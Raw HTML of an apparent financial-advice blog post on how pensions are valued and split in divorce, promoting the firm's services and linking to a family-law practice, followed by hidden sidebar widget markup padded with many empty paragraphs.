href=\"https://www.theguardian.com/lifeandstyle/2016/aug/23/divorce-new-rules-splitting-up-amicable-marriage-breakup\" target=\"_blank\">this website could be useful</a>.\r\n\r\nHowever, the longer a couple have been together the more complicated divorce proceedings are likely to be – <em>and the more there will be a need for financial planning advice.</em>\r\n<h2>Can Pensions Be Affected?</h2>\r\nThis is particularly true once pensions are brought into the divorce proceedings – and this trend will only increase with the Government’s drive to make sure that everyone is ultimately enrolled in a workplace pension.\r\n\r\n<strong>The value of a pension</strong> – especially if someone is in a public sector pension scheme – can run into hundreds of thousands of pounds and it can outstrip the value of the family home as the main asset a couple own.\r\n\r\nIn our experience it is still the case the pensions are all too often not valued properly in divorce proceedings, leading to one of the couple – and it is invariably the wife – being ‘short-changed.’\r\n\r\nThe financial calculations involved in divorce proceedings are being further complicated by increasing life expectancy. <em>Getting divorced can be the saddest and frustrating part of your life. <a href=\"http://www.mentalhealthamerica.net/separation-and-divorce\" target=\"_blank\">See coping advice</a>.\r\n</em>\r\n\r\nNo one ever gets married and has the expectation to later on get divorced, so of course it is a time where both will go <strong>through a long process of frustration</strong>.\r\n\r\nSigning papers and documents can be time consuming and so are the other problems that come with it, such as <strong>child custody and finance settlements</strong>. You will find these times to be very critical and having lawyers that know what they are doing can be a <em>great help as they are able to provide guidance</em>. If you are experiencing these difficulties, we recommend using <a href=\"https://emfl.com.au/property-settlements/\" target=\"_blank\">Emerson Family Law to handle your property settlements</a> and other assets.\r\n<h2>Understanding  your rights</h2>\r\nWe have some serious doubts regarding these tables, and yet they are still being relied on in many of the divorce cases that we see – often to the significant disadvantage of the wife.\r\n\r\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later. And yet it’s difficult – there’s an understandable reluctance to get involved in the minutiae of pensions planning.\r\n\r\nAt Equity SMART we understand how difficult a divorce can be. That’s why we give efficient, professional, easy-to-understand advice: we’ll take care of the financial side of the divorce, leaving you free to rebuild your life and look after your family. <em>You’ve enough to worry about, without worrying about money.</em>\r\n\r\n<strong>If you feel that you may be heading towards a divorce</strong> – or your clients tell you that they may be – then please don’t hesitate to get in touch with us. We’re happy to listen, and to help.\r\n<p class=\"form-submit\"><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8091\" /></p>\r\n\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big></center>people who get our best financial wisdom on a weekly basis.\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>New Guides</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-hold tabs-wrapper\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"tab-box tabs-container\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n										</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									